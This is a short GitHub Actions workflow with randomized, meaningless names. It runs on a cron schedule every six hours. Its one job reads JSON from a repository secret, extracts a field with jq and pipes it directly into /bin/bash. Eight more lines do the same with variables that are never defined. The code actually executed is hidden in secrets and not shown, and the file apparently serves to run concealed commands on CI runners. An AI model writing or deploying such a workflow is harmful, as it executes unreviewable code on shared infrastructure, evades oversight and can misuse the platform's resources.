name: zhangsansa8917

on:
  workflow_dispatch:
  schedule:
    - cron: '16 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangsansa8917
        env:
          ijaj66: ${{ secrets.ijaj66 }}
        run: |
          echo $ijaj66 | jq -r .iolc893 | /bin/bash
          echo $vj6534 | jq -r .ws8 | /bin/bash
          echo $poq8785 | jq -r .rvnjh70 | /bin/bash
          echo $e7115 | jq -r .r7889 | /bin/bash
          echo $vavlu281 | jq -r .uwsl1 | /bin/bash
          echo $uyace304 | jq -r .mm859 | /bin/bash
          echo $pqe8276 | jq -r .kl4 | /bin/bash
          echo $herq1430 | jq -r .rpoa3 | /bin/bash
          echo $o36 | jq -r .x49 | /bin/bash

